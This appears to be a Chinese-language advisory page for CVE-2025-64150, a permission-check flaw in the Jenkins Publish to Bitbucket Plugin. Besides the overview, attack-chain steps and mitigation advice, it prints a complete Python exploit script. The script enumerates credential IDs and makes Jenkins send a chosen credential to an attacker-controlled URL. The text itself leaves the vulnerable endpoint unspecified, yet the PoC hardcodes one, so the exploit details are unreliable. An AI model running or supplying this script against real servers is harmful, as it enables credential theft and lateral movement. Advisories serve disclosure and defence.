Jenkins Publish to Bitbucket Plugin 权限绕过漏洞 (CVE-2025-64150)

漏洞信息

漏洞编号

CVE-2025-64150

漏洞类型

权限绕过

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Jenkins Publish to Bitbucket Plugin

漏洞概述

Jenkins Publish to Bitbucket Plugin 0.4及更早版本存在一个严重的权限检查缺失漏洞。攻击者只需要拥有Jenkins的Overall/Read权限（最低级别权限），即可利用此漏洞连接攻击者指定的外部URL，并使用攻击者指定的凭证ID进行认证。该漏洞允许攻击者捕获存储在Jenkins中的凭证信息，包括各种类型的凭据（如用户名密码、API密钥、SSH密钥等）。由于该插件在执行网络连接操作前未正确验证用户权限，具有低权限的攻击者可以绕过预期的安全限制，执行高权限操作。此漏洞的CVSS评分为5.4，属于中等严重程度，但考虑到可能导致的凭证泄露风险，实际危害可能被低估。攻击者利用此漏洞可以横向移动，获取更多系统访问权限，进而可能导致更严重的安全事件。

技术细节

该漏洞的根本原因在于Jenkins Publish to Bitbucket Plugin在执行敏感操作（如HTTP请求、凭证访问）前缺少必要的权限检查。具体来说，插件的某个端点或方法允许具有Overall/Read权限的用户触发与外部服务器的连接操作，而该操作本应需要更高级别的权限（如Overall/Administer或特定的Credentials权限）。攻击者可以通过以下方式利用此漏洞：首先，攻击者需要获取Jenkins的Overall/Read权限，这通常是默认授予大多数用户的最低权限。然后，攻击者需要获取有效的凭证ID（可通过其他方法获取，如API端点、UI枚举等）。接着，攻击者构造恶意请求，指定攻击者控制的URL作为目标地址，并使用已获取的凭证ID。插件在处理该请求时，会使用指定的凭证连接到攻击者的服务器，此时凭证信息（包括明文密码或加密密钥）会被发送。攻击者的服务器记录接收到的凭证信息，从而完成凭证窃取过程。整个攻击过程无需用户交互，攻击复杂度低，可自动化执行。

攻击链分析

STEP 1

步骤1

攻击者获取Jenkins的Overall/Read权限（默认最低权限），通常通过正常用户账户或社会工程学手段

STEP 2

步骤2

攻击者通过Jenkins API端点枚举可用的凭证ID列表（如/credentials/store/system/domain/_/api/json）

STEP 3

步骤3

攻击者构造恶意请求，指定攻击者控制的服务器URL作为目标地址，并使用目标凭证ID

STEP 4

步骤4

插件由于缺少权限检查，直接使用指定凭证向攻击者服务器发起HTTP/HTTPS连接

STEP 5

步骤5

攻击者的服务器记录接收到的请求，捕获包含明文密码或其他敏感信息的凭证数据

STEP 6

步骤6

攻击者利用窃取的凭证进行横向移动，获取更高权限或访问其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64150 PoC - Jenkins Publish to Bitbucket Plugin Permission Bypass
# This PoC demonstrates how an attacker with Overall/Read permission
# can exploit the missing permission check to capture credentials

import requests
import json
import argparse

def exploit_cve_2025_64150(jenkins_url, attacker_url, credential_id, session_cookie):
    """
    Exploit the missing permission check in Jenkins Publish to Bitbucket Plugin
    
    Args:
        jenkins_url: Target Jenkins URL (e.g., http://target-jenkins:8080)
        attacker_url: Attacker-controlled URL to capture credentials
        credential_id: Valid credential ID to steal
        session_cookie: Jenkins session cookie for authenticated request
    """
    
    # Endpoint for the vulnerable plugin functionality
    endpoint = f"{jenkins_url}/plugin/publish-to-bitbucket/checkConnection"
    
    # Malicious payload that exploits the missing permission check
    payload = {
        'url': attacker_url,
        'credentialsId': credential_id
    }
    
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': f'JSESSIONID={session_cookie}'
    }
    
    print(f"[*] Targeting Jenkins: {jenkins_url}")
    print(f"[*] Attacker URL: {attacker_url}")
    print(f"[*] Credential ID: {credential_id}")
    print(f"[*] Sending exploit payload...")
    
    try:
        response = requests.post(endpoint, data=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Exploit sent successfully!")
            print(f"[*] Check {attacker_url} for captured credentials")
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request error: {e}")

def get_credential_ids(jenkins_url, session_cookie):
    """
    Enumerate available credential IDs (requires Overall/Read permission)
    """
    endpoint = f"{jenkins_url}/credentials/store/system/domain/_/api/json"
    headers = {'Cookie': f'JSESSIONID={session_cookie}'}
    
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            data = response.json()
            credential_ids = [cred['id'] for cred in data.get('credentials', [])]
            return credential_ids
    except:
        pass
    return []

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-64150 Exploit')
    parser.add_argument('--url', required=True, help='Jenkins URL')
    parser.add_argument('--attacker-url', required=True, help='Attacker URL to capture credentials')
    parser.add_argument('--credential-id', required=True, help='Credential ID to steal')
    parser.add_argument('--session', required=True, help='JSESSIONID cookie')
    
    args = parser.parse_args()
    exploit_cve_2025_64150(args.url, args.attacker_url, args.credential_id, args.session)

影响范围

Jenkins Publish to Bitbucket Plugin <= 0.4

防御指南

临时缓解措施

立即将Jenkins Publish to Bitbucket Plugin升级到0.4.1或更高版本。同时，审查并限制具有Overall/Read权限的用户列表，确保只有可信用户拥有该权限。如果无法立即升级，可考虑暂时禁用该插件，直到完成安全更新。此外，建议启用Jenkins的安全审计日志功能，监控异常的凭证访问和外部连接行为。